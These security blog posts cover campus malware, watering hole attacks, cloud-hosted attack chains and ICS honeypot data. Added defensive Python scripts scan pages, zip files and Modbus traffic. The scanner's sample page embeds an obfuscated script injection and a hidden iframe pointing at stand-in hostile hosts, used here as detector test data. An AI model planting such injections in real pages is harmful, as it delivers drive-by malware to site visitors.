Dark Reading reports that universities are 300% more likely to have malware on their networks than their commercial and public sector counterparts. Given the lack of standards, or the difficulty of enforcing standards, for many of the users on campus networks, this is not a huge surprise. The academic culture of share-share-share (with some exceptions) also contributes to the high malware prevalence. For many students and faculty, complying with a directive or guidance is synonymous with bending down before The Man.
The Expiro family of malware is particularly prevalent in higher education. Expiro:
- infects drives of all types: local, portable, and network
- installs malicious extensions in the Chrome and Firefox browsers
- spreads through drive-by downloads from compromised websites
- collects and steals user names, passwords, and browsing histories
I don’t see top-down, authoritative approaches ever enhancing security on campus. It just won’t fly. But that doesn’t mean don’t bother either. Core efforts to enhance security on campus need to include a robustly managed wired and wireless network backbone (what’s behind the wall), a lot of trust-building effort with students, faculty, and staff, and a lot of education and accessible (easy to implement) guidance. This requires time and staffing (i.e. $$), but it is the best opportunity to tame higher-ed malware rates.
The biggest innovation in targeted attacks by malicious actors in the past year is the Watering Hole Attack, according to the Symantec Internet Security Threat Report 2013.
A Watering Hole Attack is indirect: instead of attacking the target directly, malicious code is placed on sites that the target is known to visit. According to Threatpost, watering hole attacks have been “used primarily by state-sponsored attackers to spy on rival governments, dissident citizen groups and manufacturing organizations.” Two widely reported watering hole attacks in the past year were on the Department of Labor website and on the Council on Foreign Relations website. Watering hole attacks were also used against employees of Facebook, Apple, and Twitter when malicious code was inserted on a popular iPhone software development site.
How it works:
Watering hole attacks have multiple phases:
- Victims/targets are researched and profiled to identify which sites that group (or individual) visits or is likely to visit.
- The identified websites are probed for vulnerabilities.
- Malicious code is injected into those sites.
- At this point, the “watering hole” site is infected and ready to deliver malicious code to the targeted visitor when they appear.
- Upon visiting an infected site, the targeted visitor is redirected to another site where a separate piece of malicious code (the exploit and its payload) is downloaded onto the user’s computer. At this point, the attacker has control of the targeted user’s computer.
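As an added illustration (my own example, not code from any of the reports cited here), the following Python script shows the kind of check a site owner can run against their own pages to spot the injected elements described above: hidden iframes, script loaded from hosts outside an allowlist, and obfuscated inline script that writes a redirect into the page. The allowlist, the sample page and every host and address in it are made up for the example.

```python
"""Heuristic scan of a web page for watering-hole style injections.

Added example (not from the original article or any cited report): checks a
page's HTML for hidden iframes, script tags loading from hosts outside an
allowlist, and obfuscated inline script. The allowlist, the sample page and
its hosts/addresses are constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: hosts this site legitimately loads script from.
ALLOWED_SCRIPT_HOSTS = {"www.example.org", "cdn.example.org"}

# Inline-script constructs typical of injected redirect loaders.
OBFUSCATION_PATTERNS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"\bunescape\s*\("),
    re.compile(r"String\.fromCharCode\s*\("),
]


class InjectionScanner(HTMLParser):
    """Collects (finding_type, detail) tuples while the page is parsed."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = allowed_hosts
        self.findings = []
        self._in_inline_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            hidden = "display:none" in style or "visibility:hidden" in style
            if tiny or hidden:
                self.findings.append(("hidden-iframe", a.get("src") or ""))
        elif tag == "script":
            src = a.get("src")
            if src:
                host = urlparse(src).hostname or ""
                if host and host not in self.allowed_hosts:
                    self.findings.append(("external-script", src))
            else:
                self._in_inline_script = True
                self._script_buf = []

    def handle_data(self, data):
        if self._in_inline_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline_script:
            self._in_inline_script = False
            body = "".join(self._script_buf)
            if any(p.search(body) for p in OBFUSCATION_PATTERNS):
                self.findings.append(("obfuscated-inline-script", body[:60]))


def scan_html(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Return the list of suspicious findings for one page."""
    scanner = InjectionScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: one legitimate script, then three injected elements.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example.org/app.js"></script>
</head><body>
<h1>Regional policy updates</h1>
<script src="//stats.evil-cdn.test/c.js"></script>
<iframe src="http://198.51.100.7/in.php" width="1" height="1" style="visibility: hidden"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://203.0.113.9/x.js%22%3E%3C/script%3E'));</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind}: {detail}")
```

The findings are heuristics: a legitimate analytics tag from an unlisted host shows up as external-script, so the allowlist has to reflect what the site actually uses. The real value is running this on a schedule and diffing the output, because a watering hole injection appears as a new finding on a page that previously had none.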
One of the reasons that watering hole attacks are effective is that, in many cases, the compromised watering hole website cannot simply be “blacklisted”: it is a legitimate site and needs to stay operational. The Department of Labor site is an example; it needs to remain available.
What to do:
The primary thing SMBs can do to reduce the risk of watering hole attacks is to keep software current, i.e. “patched.” For example, on user computers running Windows, allow Windows to auto-update the operating system. Keep browser plug-ins (Java, Flash, PDF readers) current too, since those are the usual exploit targets on a watering hole page; patching cannot stop an exploit for a flaw that has no fix yet, but it closes off everything else. Larger companies might have the resources to employ network analysis and detection as well as data analytics to mitigate watering hole attacks. However, as we know, the expertise, staffing, and time for this sort of activity are typically not available to SMBs.
What work-related (or non-work-related) websites do you or your employees visit?
Jeff Wilson of Infonetics Research suggests that attack motivations include:
- political motivation
- state-sponsored electronic warfare
- social activism
- organized crime
- general mischief
Wilson also cites:
- more than 2,500 DDoS attacks per day
- over 1,100 botnets active as of the end of July
- attack duration trending down, with 86% lasting less than an hour
Network Computing suggests that the increase in attack size stems from:
- increased capability of hosts (faster computers)
- many more highly effective botnets being active
- businesses having higher capacity, so attacks need higher capacity in order to be effective
Cloud services and social media services are often touted as a way for Small to Medium-sized Businesses (SMBs) to manage their IT needs, information risk, and information security needs. While there is real potential for SMBs in this space, it is not without risk. As an example, CyberSquared has documented attackers increasingly using trusted cloud services such as Dropbox and WordPress to manage aspects of an attack.
Sophisticated, Chained Multi-component Attacks
A recent attack had these components:
- A Word document with embedded malicious content that would attempt to run upon opening.
- The content of the Word document was relevant to the recipients of the attack. In this case it appears to be a policy document for the Association of Southeast Asian Nations (ASEAN). That is, it’s a document that the targeted recipients would likely be interested in opening.
- There was also evidence that the Word document was an artifact of an earlier attack. That is, data, documents, and information stolen in earlier attacks are used as components and tools for future attacks.
- The document was placed in a Dropbox account that the attacker created quickly and at no charge.
- The attacker then emailed the Dropbox link to the targeted recipients.
- Now for some extra sneakiness: the file presents itself as a compressed (.zip) file. Upon opening it, researchers saw that the file inside used a fake Adobe PDF icon to hide the fact that it was actually a Word document (the one carrying the malicious code).
- Once a user received this Dropbox link and opened the compressed, faux-PDF, actually-malicious Word document, the next phase would start. From here the malicious code would contact a WordPress site to get command and control information, that is, specific instructions to further the attack.
- Note the IP address and port information embedded in an otherwise seemingly innocuous post.
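As an added example (mine, not the researchers’ tooling), here is a Python triage script for two of the tricks above. It checks each file inside a zip against its magic bytes, so a Word document renamed to .pdf, or an executable hiding behind a .pdf.exe double extension, is flagged regardless of the icon it shows; and it pulls IP:port pairs out of blog post text, which is what a loader reading its command and control configuration from a WordPress post would be looking for. The archive, its contents, and the post text are constructed for the example.

```python
"""Triage helpers for the chained Dropbox/WordPress attack described above.

Added example; this is not the researchers' tooling. Two checks: (1) does each
member of a zip file contain what its extension (and therefore its icon)
claims, judged by magic bytes; (2) does blog-post text carry an IP:port pair
of the kind a loader could fetch as command-and-control configuration. The
zip, its contents and the post text are constructed for this example.
"""
import io
import re
import zipfile

# Leading bytes of common container formats, with the extensions that are
# legitimate for each.
MAGIC = [
    (b"%PDF-", "pdf", {"pdf"}),
    (b"MZ", "pe-executable", {"exe", "dll", "scr"}),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2-compound", {"doc", "xls", "ppt", "msi"}),
    (b"PK\x03\x04", "zip-container", {"zip", "docx", "xlsx", "pptx", "jar"}),
]
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "txt", "jpg"}


def sniff(head):
    """Map the first bytes of a file to (kind, legitimate extensions)."""
    for magic, kind, exts in MAGIC:
        if head.startswith(magic):
            return kind, exts
    return "unknown", set()


def check_zip_members(zip_bytes):
    """Describe every file in the archive and flag icon/extension tricks."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as member:
                head = member.read(16)
            parts = info.filename.lower().rsplit("/", 1)[-1].split(".")
            ext = parts[-1] if len(parts) > 1 else ""
            kind, exts = sniff(head)
            results.append({
                "name": info.filename,
                "ext": ext,
                "content": kind,
                # Content type identified, but it does not belong to this extension.
                "ext_mismatch": kind != "unknown" and ext not in exts,
                # "Brief.pdf.exe": a document extension placed before the real one.
                "double_extension": len(parts) > 2 and parts[-2] in DOCUMENT_EXTS,
            })
    return results


# Dotted-quad followed by a port, not embedded in a longer number.
IPV4_PORT = re.compile(r"(?<![\d.])((?:\d{1,3}\.){3}\d{1,3}):(\d{1,5})(?!\d)")


def find_c2_candidates(text):
    """Return (ip, port) pairs in text that are syntactically valid endpoints."""
    hits = []
    for ip, port in IPV4_PORT.findall(text):
        octets_ok = all(int(o) <= 255 for o in ip.split("."))
        if octets_ok and 0 < int(port) <= 65535:
            hits.append((ip, int(port)))
    return hits


def build_sample_zip():
    """Constructed archive: an OLE2 (Word .doc) stub named .pdf, a real PDF
    stub, and a PE stub with a double extension."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("ASEAN_Policy_Brief.pdf", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 40)
        zf.writestr("readme.pdf", b"%PDF-1.4\n%stub\n")
        zf.writestr("Agenda.pdf.exe", b"MZ" + b"\x00" * 30)
    return buf.getvalue()


# Constructed "innocuous" post text with one plausible endpoint and one
# decoy that fails the octet check.
SAMPLE_POST = (
    "Spring update: the office repaint is done and the new coffee machine "
    "arrived. Vendor reference 203.0.113.45:8080 for the invoice; build "
    "10.0.0.300:443 is the test version, not a real address."
)

if __name__ == "__main__":
    for row in check_zip_members(build_sample_zip()):
        print(row)
    print(find_c2_candidates(SAMPLE_POST))
```

The magic-byte check is deliberately independent of the icon and the file name, because both are under the attacker’s control; a mail gateway or a user-side script that opens attachments this way catches the disguise before Explorer ever renders the fake PDF icon. The post scanner will also match legitimate addresses in technical blogs, so it is a lead to pair with the Dropbox delivery, not a verdict on its own.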
Advantages of a Trusted Public Service to Attackers
- Attackers can hide behind a trusted brand name such as Dropbox, WordPress, or Twitter
- Attacker anonymity is easy because account setup is easy
- Attackers can use the cloud service’s own infrastructure to reach victims, e.g. using Dropbox’s email notification to deliver the link
- Malicious content hosted this way easily bypasses old-school detection mechanisms, since reputation-based filtering trusts the hosting domain
This is some pretty sneaky stuff embedded in trusted services that often market directly to SMBs. I’m not saying don’t use them; they do offer huge convenience and direct cost savings. However, it is critical to recognize that they don’t offer a slam-dunk solution for security. Indeed, no solution offers this. Like everything else, reflection on risk needs to occur to give an SMB the best chance of making good decisions.
ICS attacks by business sector
— ICS-CERT responded to over 200 Industrial Control System (ICS) incidents between October 2012 and May 2013.
— Highest percentage in the energy sector: 53%
— Critical Manufacturing sector follows: 17%
ICS attacks by source country
— Trend Micro research emulated an Industrial Control System with honeypots
— It took only 18 hours for the first honeypot to be attacked
— Over 28 days, 39 attacks from 14 countries
— Of the 39 attacks, 12 were unique and considered ‘targeted’
— Attackers demonstrated experience and expertise with the Modbus industrial control protocol
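For a concrete picture of what “expertise with Modbus” looks like on the wire, here is an added Python example (mine, not Trend Micro’s honeypot code) that parses Modbus/TCP requests and separates reads, which look like reconnaissance, from writes, which change a controller’s state. Function code meanings follow the public Modbus application protocol specification; the capture, the addresses and the trusted-source allowlist are constructed for the example.

```python
"""Classify Modbus/TCP requests seen at an ICS honeypot.

Added example, not Trend Micro's honeypot code. Parses the MBAP header and
function code of each request and flags writes from sources that are not on
an allowlist, malformed frames, and function codes outside the common set.
Function code meanings follow the public Modbus application protocol
specification; the capture, addresses and allowlist are constructed.
"""
import struct

READ_FUNCS = {
    1: "read coils", 2: "read discrete inputs",
    3: "read holding registers", 4: "read input registers",
}
WRITE_FUNCS = {
    5: "write single coil", 6: "write single register",
    15: "write multiple coils", 16: "write multiple registers",
}


def parse_modbus_tcp(frame):
    """Parse one Modbus/TCP ADU; raise ValueError if it is malformed.

    MBAP header: transaction id (2), protocol id (2, always 0), length (2,
    number of bytes that follow it, i.e. unit id + PDU), unit id (1).
    PDU: function code (1) + data.
    """
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header plus function code")
    tid, pid, length, unit = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError(f"protocol id {pid} is not Modbus")
    if length != len(frame) - 6:
        raise ValueError("length field disagrees with frame size")
    func, pdu = frame[7], frame[8:]
    rec = {"tid": tid, "unit": unit, "func": func, "data": pdu}
    if func in READ_FUNCS or func in WRITE_FUNCS:
        if len(pdu) < 4:
            raise ValueError("read/write PDU needs address and count/value")
        # All eight common codes start with a 16-bit address followed by a
        # 16-bit quantity (reads, multi-writes) or value (single writes).
        rec["addr"], rec["count_or_value"] = struct.unpack(">HH", pdu[:4])
    return rec


def triage(capture, trusted_sources=frozenset()):
    """capture: list of (source_ip, frame_bytes). Returns alert tuples."""
    alerts = []
    for src, frame in capture:
        try:
            rec = parse_modbus_tcp(frame)
        except ValueError as err:
            alerts.append((src, "malformed", str(err)))
            continue
        if rec["func"] in WRITE_FUNCS:
            if src not in trusted_sources:
                desc = f"{WRITE_FUNCS[rec['func']]} unit={rec['unit']} addr={rec['addr']}"
                alerts.append((src, "write-from-untrusted-source", desc))
        elif rec["func"] not in READ_FUNCS:
            alerts.append((src, "unusual-function-code", str(rec["func"])))
    return alerts


# Constructed capture. 192.0.2.10 plays the legitimate HMI; the others are
# outsiders hitting the honeypot.
SAMPLE_CAPTURE = [
    ("192.0.2.10", bytes.fromhex("00010000000601030000000a")),  # read 10 holding regs
    ("192.0.2.10", bytes.fromhex("00020000000601060010ffff")),  # write reg 0x10 = 0xFFFF
    ("198.51.100.23", bytes.fromhex("00030000000b0110000000020400010002")),  # write 2 regs at 0
    ("198.51.100.23", bytes.fromhex("000400000005012b0e0100")),  # 0x2B read device identification
    ("203.0.113.77", bytes.fromhex("000500000006010300")),  # length field lies
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_CAPTURE, trusted_sources={"192.0.2.10"}):
        print(alert)
```

Modbus has no authentication, so “trusted” can only mean a source address that is supposed to talk to the PLC; anything else writing coils or registers is the event worth paging on. The malformed case matters too: a length field that disagrees with the frame is what a fuzzer or a hand-built exploit tends to produce, not an HMI, and the 0x2B device-identification request is a typical first step for an attacker working out what hardware the honeypot is pretending to be.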
from Symantec Intelligence Report June 2012 (via InfoWeek & DarkReading)